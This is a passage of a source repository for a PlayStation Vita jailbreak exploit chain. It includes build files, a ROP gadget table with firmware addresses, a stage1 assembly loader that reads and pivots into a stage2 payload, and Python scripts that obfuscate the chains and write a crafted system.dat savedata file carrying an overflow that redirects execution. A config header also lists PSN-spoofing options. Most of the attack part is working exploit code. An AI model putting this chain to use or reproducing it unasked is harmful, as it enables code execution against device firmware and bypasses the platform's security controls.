├── bootstrap
    ├── res
    │   └── dummy
    ├── CMakeLists.txt
    ├── pspdebug.h
    ├── scr_printf.c
    ├── font.c
    └── bootstrap.c
├── .gitignore
├── .gitmodules
├── plugin
    ├── config.h
    ├── user.yml
    ├── kernel.yml
    ├── LICENSE
    ├── henkaku.h
    ├── taihen.json
    ├── CMakeLists.txt
    ├── henkaku_settings.xml
    ├── system_settings.xml
    ├── kernel.c
    ├── language.h
    └── user.c
├── stage1
    ├── linker.x
    ├── Makefile
    └── stage1.S
├── stage2
    ├── linker.x
    ├── Makefile
    ├── krop.S
    └── stage2.S
├── payload
    ├── linker.x
    ├── Makefile
    └── LICENSE
├── scripts
    ├── trim.py
    ├── obfuscate.py
    └── generate.py
├── include
    ├── constants.S
    ├── gadgets.S
    ├── functions.S
    └── macros.S
├── LICENSE
├── Makefile
└── README.md


/bootstrap/res/dummy:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | build
2 | *.o
3 | *.elf
4 | *.bin
5 | *.gz
6 | *.dat
7 | 


--------------------------------------------------------------------------------
/.gitmodules:
--------------------------------------------------------------------------------
1 | [submodule "taiHEN"]
2 | 	path = taiHEN
3 | 	url = git://github.com/TheOfficialFloW/taiHEN.git
4 | 


--------------------------------------------------------------------------------
/plugin/config.h:
--------------------------------------------------------------------------------
1 | #define BETA_RELEASE 0
2 | #define ENSO_RELEASE 0
3 | #define HENKAKU_RELEASE 2
4 | #define PSN_PASSPHRASE ""
5 | 


--------------------------------------------------------------------------------
/plugin/user.yml:
--------------------------------------------------------------------------------
1 | HENkakuUser:
2 |   attributes: 0
3 |   version:
4 |     major: 1
5 |     minor: 1
6 |   main:
7 |     start: module_start
8 |     stop: module_stop
9 | 


--------------------------------------------------------------------------------
/stage1/linker.x:
--------------------------------------------------------------------------------
 1 | OUTPUT_FORMAT("elf32-littlearm", "elf32-bigarm", "elf32-littlearm")
 2 | OUTPUT_ARCH(arm)
 3 | 
 4 | ENTRY(_start)
 5 | 
 6 | SECTIONS
 7 | {
 8 |   . = 0x810c0dfc;
 9 | }
10 | 


--------------------------------------------------------------------------------
/stage2/linker.x:
--------------------------------------------------------------------------------
 1 | OUTPUT_FORMAT("elf32-littlearm", "elf32-bigarm", "elf32-littlearm")
 2 | OUTPUT_ARCH(arm)
 3 | 
 4 | ENTRY(_start)
 5 | 
 6 | SECTIONS
 7 | {
 8 |   . = 0x81e82000;
 9 | }
10 | 


--------------------------------------------------------------------------------
/plugin/kernel.yml:
--------------------------------------------------------------------------------
 1 | HENkaku:
 2 |   attributes: 0
 3 |   version:
 4 |     major: 1
 5 |     minor: 1
 6 |   main:
 7 |     start: module_start
 8 |     stop: module_stop
 9 |   modules:
10 |     HENkaku:
11 |       syscall: true
12 |       functions:
13 |         - henkaku_reload_config
14 | 


--------------------------------------------------------------------------------
/stage1/Makefile:
--------------------------------------------------------------------------------
 1 | TARGET  = stage1
 2 | OBJS    = stage1.o
 3 | 
 4 | PREFIX  = arm-vita-eabi
 5 | CC      = $(PREFIX)-gcc
 6 | AS      = $(PREFIX)-as
 7 | OBJCOPY = $(PREFIX)-objcopy
 8 | CFLAGS  =
 9 | LDFLAGS = -T linker.x -nostartfiles
10 | 
11 | all: $(TARGET).bin
12 | 
13 | %.bin: %.elf
14 | 	$(OBJCOPY) -S -O binary $^ $@
15 | 
16 | $(TARGET).elf: $(OBJS)
17 | 	$(CC) $(CFLAGS) $^ -o $@ $(LDFLAGS)
18 | 
19 | clean:
20 | 	@rm -f $(TARGET).bin $(TARGET).elf $(OBJS)
21 | 


--------------------------------------------------------------------------------
/stage2/Makefile:
--------------------------------------------------------------------------------
 1 | TARGET  = stage2
 2 | OBJS    = stage2.o
 3 | 
 4 | PREFIX  = arm-vita-eabi
 5 | CC      = $(PREFIX)-gcc
 6 | AS      = $(PREFIX)-as
 7 | OBJCOPY = $(PREFIX)-objcopy
 8 | CFLAGS  =
 9 | LDFLAGS = -T linker.x -nostartfiles
10 | 
11 | all: $(TARGET).bin
12 | 
13 | %.bin: %.elf
14 | 	$(OBJCOPY) -S -O binary $^ $@
15 | 
16 | $(TARGET).elf: $(OBJS)
17 | 	$(CC) $(CFLAGS) $^ -o $@ $(LDFLAGS)
18 | 
19 | clean:
20 | 	@rm -f $(TARGET).bin $(TARGET).elf $(OBJS)
21 | 


--------------------------------------------------------------------------------
/payload/linker.x:
--------------------------------------------------------------------------------
 1 | OUTPUT_FORMAT("elf32-littlearm", "elf32-bigarm", "elf32-littlearm")
 2 | OUTPUT_ARCH(arm)
 3 | 
 4 | ENTRY(_start)
 5 | 
 6 | SECTIONS
 7 | {
 8 |   .text     : { *(.text.start) *(.text   .text.*   .gnu.linkonce.t.*) *(.sceStub.text.*) }
 9 |   .rodata   : { *(.rodata .rodata.* .gnu.linkonce.r.*) }
10 |   .data     : { *(.data   .data.*   .gnu.linkonce.d.*) }
11 |   .bss      : { *(.bss    .bss.*    .gnu.linkonce.b.*) *(COMMON) }
12 |   /DISCARD/ : { *(.interp) *(.dynsym) *(.dynstr) *(.hash) *(.dynamic) *(.comment) }
13 | }
14 | 


--------------------------------------------------------------------------------
/payload/Makefile:
--------------------------------------------------------------------------------
 1 | TARGET  = payload
 2 | OBJS    = payload.o
 3 | 
 4 | PREFIX  = arm-vita-eabi
 5 | CC      = $(PREFIX)-gcc
 6 | AS      = $(PREFIX)-as
 7 | OBJCOPY = $(PREFIX)-objcopy
 8 | CFLAGS  = -fPIE -fno-zero-initialized-in-bss -std=c99 -mcpu=cortex-a9 -Os -mthumb
 9 | LDFLAGS = -T linker.x -nostartfiles -nostdlib -pie
10 | 
11 | all: $(TARGET).bin
12 | 
13 | %.bin: %.elf
14 | 	$(OBJCOPY) -S -O binary $^ $@
15 | 
16 | $(TARGET).elf: $(OBJS)
17 | 	$(CC) $(CFLAGS) $^ -o $@ $(LDFLAGS)
18 | 
19 | clean:
20 | 	@rm -f $(TARGET).bin $(TARGET).elf $(OBJS)
21 | 


--------------------------------------------------------------------------------
/scripts/trim.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python2
 2 | from sys import argv, exit
 3 | import struct
 4 | 
 5 | def main():
 6 |   if len(argv) != 2:
 7 |     print("Usage: trim.py binary")
 8 |     return -1
 9 | 
10 |   with open(argv[1], "rb") as f:
11 |     data = f.read()
12 | 
13 |   new_len = len(data)
14 |   if new_len < 4:
15 |     return -1
16 | 
17 |   for i in range(new_len-4, 0, -4):
18 |     word, = struct.unpack("<I", data[(i):(i+4)])
19 |     if word != 0:
20 |       new_len = i
21 |       break
22 | 
23 |   open(argv[1], "wb").write(data[:new_len+4])
24 | 
25 | if __name__ == "__main__":
26 |   exit(main())
27 | 


--------------------------------------------------------------------------------
/include/constants.S:
--------------------------------------------------------------------------------
 1 | /* constants.S -- sce constants
 2 |  *
 3 |  * Copyright (C) 2018 TheFloW
 4 |  *
 5 |  * This software may be modified and distributed under the terms
 6 |  * of the MIT license.  See the LICENSE file for details.
 7 |  */
 8 | 
 9 | .equ NULL,                                   0
10 | 
11 | .equ SCE_KERNEL_DEFAULT_PRIORITY,            0x10000100
12 | 
13 | .equ SCE_KERNEL_MEMBLOCK_TYPE_USER_CDRAM_RW, 0x09408060
14 | .equ SCE_KERNEL_MEMBLOCK_TYPE_KERNEL_RX,     0x1020d005
15 | .equ SCE_KERNEL_MEMBLOCK_TYPE_KERNEL_RW,     0x1020d006
16 | 
17 | .equ SCE_NGS_VOICE_DEFINITION_MAGIC,         0x66647662
18 | .equ SCE_NGS_VOICE_DEFINITION_XOR,           0x9e28dcce
19 | .equ SCE_NGS_VOICE_DEFINITION_FLAGS,         0x00010001
20 | .equ SCE_NGS_ERROR_INVALID_PARAM,            0x804a0002
21 | 
22 | .equ SCE_SYSMODULE_NGS,                      0xb
23 | 
24 | .equ SCE_O_RDONLY,                           1
25 | 
26 | .equ SCE_DISPLAY_SETBUF_NEXTFRAME,           1
27 | 
28 | .equ VDISP_STATE_EXIT,                       5
29 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | The MIT License (MIT)
 2 | 
 3 | Copyright (c) 2018 TheFloW
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/payload/LICENSE:
--------------------------------------------------------------------------------
 1 | The MIT License (MIT)
 2 | 
 3 | Copyright (c) 2016 molecule
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/plugin/LICENSE:
--------------------------------------------------------------------------------
 1 | The MIT License (MIT)
 2 | 
 3 | Copyright (c) 2016 molecule
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
 1 | all:
 2 | 	make henkaku
 3 | 	make menu
 4 | 	make exploit
 5 | 
 6 | exploit:
 7 | 	cd payload; make; rm ../stage2/payload.bin.gz; gzip -9 -n -c payload.bin > ../stage2/payload.bin.gz
 8 | 	cd stage2; make
 9 | 	cd stage1; make
10 | 	./scripts/obfuscate.py stage1/stage1.bin 1
11 | 	./scripts/obfuscate.py stage2/stage2.bin 2
12 | 	./scripts/trim.py stage2/stage2.bin
13 | 	./scripts/generate.py stage1/stage1.bin stage2/stage2.bin system.dat
14 | 
15 | henkaku:
16 | 	cd taiHEN; mkdir build; cd build; cmake ..; make; cp taihen.skprx ../../bootstrap/res/taihen.skprx
17 | 	cd plugin; mkdir build; cd build; cmake ..; make; cp henkaku.skprx ../../bootstrap/res/henkaku.skprx; cp henkaku.suprx ../../bootstrap/res/henkaku.suprx
18 | 
19 | menu:
20 | 	cd bootstrap; mkdir build; cd build; cmake ..; make; xxd -i bootstrap.self > ../../payload/bootstrap.h
21 | 
22 | clean:
23 | 	-rm system.dat
24 | 	-rm -rf taiHEN/build
25 | 	-rm -rf plugin/build
26 | 	-rm -rf bootstrap/build
27 | 	-rm bootstrap/res/taihen.skprx
28 | 	-rm bootstrap/res/henkaku.skprx
29 | 	-rm bootstrap/res/henkaku.suprx
30 | 	-rm payload/bootstrap.h
31 | 	-rm stage2/payload.bin.gz
32 | 	cd payload; make clean
33 | 	cd stage2; make clean
34 | 	cd stage1; make clean
35 | 


--------------------------------------------------------------------------------
/plugin/henkaku.h:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @brief      Internal functions and defines
 3 |  */
 4 | #ifndef HENKAKU_HEADER
 5 | #define HENKAKU_HEADER
 6 | 
 7 | #include <stdint.h>
 8 | 
 9 | // TODO: Move to sdk
10 | int sceClibPrintf(const char *fmt, ...);
11 | int sceClibSnprintf(char *buf, size_t len, const char *fmt, ...);
12 | 
13 | int henkaku_reload_config(void);
14 | int taiReloadConfig(void);
15 | 
16 | /** Logging function */
17 | #ifdef ENABLE_LOGGING
18 | #ifdef __VITA_KERNEL__
19 | #define LOG(fmt, ...) printf("[%s:%d] " fmt "\n", __FUNCTION__, __LINE__, ##__VA_ARGS__)
20 | #else
21 | #define LOG(fmt, ...) sceClibPrintf("[%s:%d] " fmt "\n", __FUNCTION__, __LINE__, ##__VA_ARGS__)
22 | #endif
23 | #else
24 | #define LOG(fmt, ...)
25 | #endif
26 | 
27 | /** Config */
28 | typedef struct {
29 |   uint32_t magic;
30 |   uint32_t version;
31 |   uint32_t use_psn_spoofing;
32 |   uint32_t allow_unsafe_hb;
33 |   uint32_t use_spoofed_version;
34 |   uint32_t spoofed_version;
35 | } __attribute__((packed)) henkaku_config_t;
36 | 
37 | #define HENKAKU_CONFIG_MAGIC (0x4C434C4D)
38 | #define CONFIG_PATH "ur0:tai/henkaku_config.bin"
39 | #define OLD_CONFIG_PATH "ux0:temp/app_work/MLCL00001/rec/config.bin"
40 | #define SPOOF_VERSION (0x3700000)
41 | 
42 | #endif // HENKAKU_HEADER
43 | 


--------------------------------------------------------------------------------
/stage1/stage1.S:
--------------------------------------------------------------------------------
 1 | /* stage1.S -- load and execute stage2
 2 |  *
 3 |  * Copyright (C) 2018 TheFloW
 4 |  *
 5 |  * This software may be modified and distributed under the terms
 6 |  * of the MIT license.  See the LICENSE file for details.
 7 |  */
 8 | 
 9 | .include "../include/constants.S"
10 | .include "../include/functions.S"
11 | .include "../include/gadgets.S"
12 | .include "../include/macros.S"
13 | 
14 | // stage2 information
15 | .equ STAGE2_ADDRESS, 0x81e82000
16 | .equ STAGE2_SIZE,    0x30000
17 | 
18 | .global _start
19 | _start:
20 |   // Create a new thread whose stack base address should be at 0x81e81000
21 |   call_vvvvvvv sceKernelCreateThread, empty_string, pop_pc, SCE_KERNEL_DEFAULT_PRIORITY, 0x40000, 0, 0, NULL
22 |   store_rv     ret, thread_id
23 | 
24 |   // Load stage2
25 |   call_vvv sceIoOpen,  savedata0_system_dat_path, SCE_O_RDONLY, 0
26 |   store_rv ret,        system_dat_fd
27 |   call_lvv sceIoRead,  system_dat_fd, STAGE2_ADDRESS - (0x48 + 0x4 + _end - _start), STAGE2_SIZE
28 |   call_l   sceIoClose, system_dat_fd
29 | 
30 |   // Start thread and stack pivot
31 |   call_lvv sceKernelStartThread, thread_id, thread_rop_end - thread_rop_start, thread_rop_start
32 | 
33 |   // Exit and delete thread
34 |   call_v sceKernelExitDeleteThread, 0
35 | 
36 | // Data section
37 | 
38 | // Thread rop chain
39 | thread_rop_start:
40 |   set_r0_r2_ip_sp_lr_pc ldm_data_r0
41 | thread_rop_end:
42 | 
43 | // ldm data for setting sp
44 | ldm_data_r0:   .word 0xDEADBEEF     // r0
45 |                .word 0xDEADBEEF     // r2
46 |                .word 0xDEADBEEF     // ip
47 |                .word STAGE2_ADDRESS // sp
48 |                .word 0xDEADBEEF     // lr
49 |                .word pop_pc         // pc
50 | 
51 | // Thread id
52 | thread_id:     .word 0xDEADBEEF
53 | 
54 | // stage2 fd
55 | system_dat_fd: .word 0xDEADBEEF
56 | 
57 | _end:
58 | 


--------------------------------------------------------------------------------
/scripts/obfuscate.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python2
 2 | from sys import argv, exit
 3 | import random
 4 | import struct
 5 | 
 6 | gadgets = [
 7 |   0x8102a2f3,
 8 |   0x8102a3d3,
 9 |   0x81005579,
10 |   0x8100a107,
11 |   0x8100a16b,
12 |   0x8100717b,
13 |   0x8102978d,
14 |   0x81000c69,
15 |   0x810321ed,
16 |   0x810321fd,
17 |   0x81021795,
18 |   0x81000065,
19 |   0x8102675d,
20 |   0x81000bf5,
21 |   0x81026bad,
22 | ]
23 | 
24 | def main():
25 |   if len(argv) != 3:
26 |     print("Usage: obfuscate.py binary stage_number")
27 |     return -1
28 | 
29 |   if argv[2] == "1":
30 |     random.seed(42)
31 |   else:
32 |     random.seed(69)
33 | 
34 |   with open(argv[1], "rb") as f:
35 |     data = bytearray(f.read())
36 | 
37 |   for i in range(0, len(data), 4):
38 |     word, = struct.unpack("<I", data[(i):(i+4)])
39 |     if word == 0xDEADBEEF:
40 |       random_gadget = struct.pack("I", word)
41 |       valid = False
42 |       while not valid:
43 |         random_choice = random.randint(0, 10)
44 |         if random_choice == 0:
45 |           random_number = random.randrange(0x810c0d00, 0x810c1000, 0x04)
46 |         elif random_choice == 1:
47 |           random_number = random.randrange(0x81e82000, 0x81ea2000, 0x04)
48 |         elif random_choice >= 2 and random_choice < 4:
49 |           random_number = random.randrange(0x8102f294, 0x81030044, 0x10)
50 |         elif random_choice >= 4 and random_choice < 6:
51 |           random_number = random.randint(0x81000000, 0x8102f294) | 0x1
52 |         else:
53 |           random_number = random.choice(gadgets)
54 |         random_gadget = struct.pack("I", random_number)
55 |         valid = True
56 |         if argv[2] == "1" and random_number == 0xffff:
57 |           valid = False
58 |       data[(i):(i+4)] = random_gadget
59 | 
60 |   open(argv[1], "wb").write(data)
61 | 
62 | if __name__ == "__main__":
63 |   exit(main())
64 | 


--------------------------------------------------------------------------------
/plugin/taihen.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "taihen": {
 3 |     "nid": 910080232,
 4 |     "modules": {
 5 |       "taihen": {
 6 |         "nid": 540875304,
 7 |         "kernel": false,
 8 |         "functions": {
 9 |           "taiHookFunctionExportForUser": 2269553102,
10 |           "taiHookFunctionImportForUser": 1399025245,
11 |           "taiHookFunctionOffsetForUser": 87368282,
12 |           "taiGetModuleInfo": 2777256836,
13 |           "taiHookRelease": 472967065,
14 |           "taiInjectAbs": 1247316228,
15 |           "taiInjectDataForUser": 3458578876,
16 |           "taiInjectRelease": 564447398
17 |         },
18 |         "variables": {
19 |         }
20 |       }, 
21 |       "taihenForKernel": {
22 |         "nid": 3487819968,
23 |         "kernel": true,
24 |         "functions": {
25 |           "taiHookFunctionAbs": 3605329551,
26 |           "taiHookFunctionExportForKernel": 1171062720,
27 |           "taiHookFunctionImportForKernel": 1159321730,
28 |           "taiHookFunctionOffsetForKernel": 2402393463,
29 |           "taiGetModuleInfoForKernel": 1855132055,
30 |           "taiHookReleaseForKernel": 3525736650,
31 |           "taiInjectAbsForKernel": 4230976111,
32 |           "taiInjectDataForKernel": 2678390840,
33 |           "taiInjectReleaseForKernel": 1371225801,
34 |           "taiLoadPluginsForTitleForKernel": 2621581546
35 |         },
36 |         "variables": {
37 |         }
38 |       }, 
39 |       "taihenUnsafe": {
40 |         "nid": 2998301478,
41 |         "kernel": false,
42 |         "functions": {
43 |           "taiLoadKernelModule": 3603990244,
44 |           "taiStartKernelModuleForUser": 2850755214,
45 |           "taiLoadStartKernelModuleForUser": 2559617235,
46 |           "taiLoadStartModuleForPidForUser": 3897797579,
47 |           "taiStopUnloadKernelModuleForUser": 1277030648,
48 |           "taiUnloadKernelModule": 1275696130,
49 |           "taiMemcpyUserToKernel": 4138861294,
50 |           "taiMemcpyKernelToUser": 2310758437
51 |         },
52 |         "variables": {
53 |         }
54 |       }
55 |     }
56 |   }
57 | }


--------------------------------------------------------------------------------
/bootstrap/CMakeLists.txt:
--------------------------------------------------------------------------------
 1 | cmake_minimum_required(VERSION 2.8)
 2 | 
 3 | if(NOT DEFINED CMAKE_TOOLCHAIN_FILE)
 4 |   if(DEFINED ENV{VITASDK})
 5 |     set(CMAKE_TOOLCHAIN_FILE "$ENV{VITASDK}/share/vita.toolchain.cmake" CACHE PATH "toolchain file")
 6 |   else()
 7 |     message(FATAL_ERROR "Please define VITASDK to point to your SDK path!")
 8 |   endif()
 9 | endif()
10 | 
11 | project(bootstrap)
12 | include("${VITASDK}/share/vita.cmake" REQUIRED)
13 | 
14 | set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -Wall -Os -Wno-unused-variable -Wno-unused-but-set-variable")
15 | set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -std=c++11 -fno-rtti -fno-exceptions")
16 | 
17 | include_directories(
18 | )
19 | 
20 | link_directories(
21 |   ${CMAKE_CURRENT_BINARY_DIR}
22 | )
23 | 
24 | # Builds
25 | FUNCTION(ADD_RESOURCES out_var)
26 |   SET(result)
27 |   FOREACH(in_f ${ARGN})
28 |   SET(out_f "${CMAKE_CURRENT_BINARY_DIR}/${in_f}.o")
29 |   GET_FILENAME_COMPONENT(out_dir ${out_f} DIRECTORY)
30 |   ADD_CUSTOM_COMMAND(OUTPUT ${out_f}
31 |     COMMAND ${CMAKE_COMMAND} -E make_directory ${out_dir}
32 |     COMMAND ${CMAKE_LINKER} -r -b binary -o ${out_f} ${in_f}
33 |     DEPENDS ${in_f}
34 |     WORKING_DIRECTORY ${CMAKE_SOURCE_DIR}
35 |     COMMENT "Building resource ${out_f}"
36 |     VERBATIM
37 |     )
38 |   LIST(APPEND result ${out_f})
39 |   ENDFOREACH()
40 |   SET(${out_var} "${result}" PARENT_SCOPE)
41 | ENDFUNCTION()
42 | 
43 | file(GLOB res_files RELATIVE
44 |   ${CMAKE_SOURCE_DIR}
45 |   res/*
46 | )
47 | add_resources(henkaku_res ${res_files})
48 | 
49 | add_executable(bootstrap
50 |   ${henkaku_res}
51 |   bootstrap.c
52 |   scr_printf.c
53 |   font.c
54 | )
55 | 
56 | target_link_libraries(bootstrap
57 |   gcc
58 |   SceLibKernel_stub
59 |   SceIofilemgr_stub
60 |   SceKernelThreadMgr_stub
61 |   SceSysmem_stub
62 |   SceProcessmgr_stub
63 |   SceDisplay_stub
64 |   SceNet_stub
65 |   SceNetCtl_stub
66 |   SceHttp_stub
67 |   SceSsl_stub
68 |   SceShellSvc_stub
69 |   SceCtrl_stub
70 |   SceSysmodule_stub
71 |   SceAppMgr_stub
72 |   SceAppUtil_stub
73 |   ScePromoterUtil_stub
74 |   SceRegistryMgr_stub
75 | )
76 | 
77 | set_target_properties(bootstrap
78 |   PROPERTIES LINK_FLAGS "-nostdlib"
79 | )
80 | 
81 | vita_create_self(bootstrap.self bootstrap UNSAFE)
82 | 


--------------------------------------------------------------------------------
/include/gadgets.S:
--------------------------------------------------------------------------------
 1 | /* gadgets.S -- rop gadgets
 2 |  *
 3 |  * Copyright (C) 2018 TheFloW
 4 |  *
 5 |  * This software may be modified and distributed under the terms
 6 |  * of the MIT license.  See the LICENSE file for details.
 7 |  */
 8 | 
 9 | // call
10 | .equ blx_r0_add_sp_4_pop_pc,            0x8102a2f3
11 | .equ blx_r0_add_sp_14_pop_pc,           0x8102a3d3
12 | .equ blx_r1_add_sp_4_pop_pc,            0x81005579
13 | .equ blx_r2_add_sp_c_pop_pc,            0x8100a107
14 | .equ blx_r3_add_sp_14_pop_pc,           0x8100a16b
15 | .equ blx_lr_add_sp_14_pop_pc,           0x8100a1cb
16 | 
17 | // load
18 | .equ pop_pc,                            0x810002c1
19 | .equ pop_r0_r1_r2_r4_pc,                0x810321ed
20 | .equ pop_r0_r1_r2_r3_r4_r5_r7_pc,       0x810321fd
21 | .equ pop_r3_r5_pc,                      0x81021795
22 | .equ pop_r4_pc,                         0x81000065
23 | .equ pop_r4_r5_r6_r7_r8_sb_pc,          0x8102675d
24 | .equ ldm_sp_r0_r1_add_sp_c_pop_pc,      0x81026bad
25 | .equ ldm_r0_r0_r2_ip_sp_lr_pc,          0x8102aac0 // arm
26 | .equ ldm_r8_r0_r1_r4_r5_sl_ip_lr_pc,    0x8103a66c // arm
27 | .equ ldr_r0_sp_add_sp_4_pop_pc,         0x81000bf5
28 | .equ ldr_r0_r0_bx_lr,                   0x81005843
29 | 
30 | // store
31 | .equ str_r0_r1_add_sp_4_pop_pc,         0x8100717b
32 | 
33 | // move
34 | .equ mov_r0_r4_blx_lr,                  0x8100914b
35 | .equ mov_r1_r4_blx_r3,                  0x8100a701
36 | .equ movs_r1_r0_pop_r4_pc,              0x8102978d
37 | .equ movs_r2_r4_add_sp_8_bx_lr,         0x8102d339
38 | .equ movs_r4_r0_add_sp_c_pop_pc,        0x81000c69
39 | 
40 | // arithmetic
41 | .equ add_r0_r1_add_sp_10_bx_lr,         0x8102daa7
42 | .equ adcs_r0_lr_r5_lsl_12_pop_pc,       0x810111a9
43 | .equ adds_r1_r1_r3_add_r0_r2_r1_bx_lr,  0x8102ea0f
44 | .equ add_sp_14_pop_pc,                  0x81000d5f
45 | .equ subs_r1_r4_r1_blx_r3,              0x8102f1fd
46 | .equ muls_r0_r2_r0_subs_r3_r3_r0_bx_lr, 0x8102c21b
47 | 
48 | // logical
49 | .equ eors_r4_r0_movt_r0_8103_bx_lr,     0x8102e5fb
50 | 
51 | // compare
52 | .equ cmp_eq_r0_r1_add_sp_8_bx_lr,       0x8101f581
53 | 
54 | // misc
55 | .equ vdispEnd,                          0x81001e33
56 | .equ vdispSetState,                     0x81001efb
57 | .equ vdispCtrl,                         0x8103c9f8
58 | .equ empty_string,                      0x81000006
59 | .equ savedata0_system_dat_path,         0x81035614
60 | 


--------------------------------------------------------------------------------
/scripts/generate.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python2
 2 | from sys import argv, exit
 3 | import random
 4 | import struct
 5 | 
 6 | gadgets = [
 7 |   0x8102a2f3,
 8 |   0x8102a3d3,
 9 |   0x81005579,
10 |   0x8100a107,
11 |   0x8100a16b,
12 |   0x8100717b,
13 |   0x8102978d,
14 |   0x81000c69,
15 |   0x810321ed,
16 |   0x810321fd,
17 |   0x81021795,
18 |   0x81000065,
19 |   0x8102675d,
20 |   0x81000bf5,
21 |   0x81026bad,
22 | ]
23 | 
24 | def gen_random_gadget():
25 |   random_gadget = 0
26 |   valid = False
27 |   while not valid:
28 |     random_choice = random.randint(0, 10)
29 |     if random_choice == 0:
30 |       random_number = random.randrange(0x810c0d00, 0x810c1000, 0x04)
31 |     elif random_choice == 1:
32 |       random_number = random.randrange(0x81e82000, 0x81ea2000, 0x04)
33 |     elif random_choice >= 2 and random_choice < 4:
34 |       random_number = random.randrange(0x8102f294, 0x81030044, 0x10)
35 |     elif random_choice >= 4 and random_choice < 6:
36 |       random_number = random.randint(0x81000000, 0x8102f294) | 0x1
37 |     else:
38 |       random_number = random.choice(gadgets)
39 |     random_gadget = struct.pack("I", random_number)
40 |     valid = True
41 |     if random_number == 0xffff:
42 |       valid = False
43 |     else:
44 |       for j in range(0, 4):
45 |         byte = random_gadget[j]
46 |         if byte == "\x0A" or byte == "\x0D":
47 |           valid = False
48 |           break
49 |   return random_gadget
50 | 
51 | def main():
52 |   if len(argv) != 4:
53 |     print("Usage: gen.py stage1.bin stage2.bin system.dat")
54 |     return -1
55 | 
56 |   random.seed(1337)
57 | 
58 |   with open(argv[1], "rb") as fin:
59 |     stage1 = fin.read()
60 |   with open(argv[2], "rb") as fin:
61 |     stage2 = fin.read()
62 |   with open(argv[3], "wb") as fout:
63 |     # write 0x38 bytes of random gadgets
64 |     for i in range(0, 0x38, 4):
65 |       fout.write(gen_random_gadget())
66 |     # write overflow which redirects destination
67 |     fout.write(struct.pack("I", 0x810c0dfa))
68 |     # write random gadget
69 |     fout.write(gen_random_gadget())
70 |     # write offset
71 |     fout.write(struct.pack("I", 0))
72 |     # write newline delimiter
73 |     fout.write(struct.pack("H", 0x000a))
74 |     # write dummy
75 |     fout.write(struct.pack("H", 0x8123))
76 |     # write stage1
77 |     fout.write(stage1)
78 |     # write eof
79 |     fout.write(struct.pack("H", 0xffff))
80 |     # write dummy
81 |     fout.write(struct.pack("H", 0x8123))
82 |     # write stage2
83 |     fout.write(stage2)
84 | 
85 | if __name__ == "__main__":
86 |   exit(main())
87 | 


--------------------------------------------------------------------------------
/plugin/CMakeLists.txt:
--------------------------------------------------------------------------------
  1 | cmake_minimum_required(VERSION 2.8)
  2 | 
  3 | if(NOT DEFINED CMAKE_TOOLCHAIN_FILE)
  4 |   if(DEFINED ENV{VITASDK})
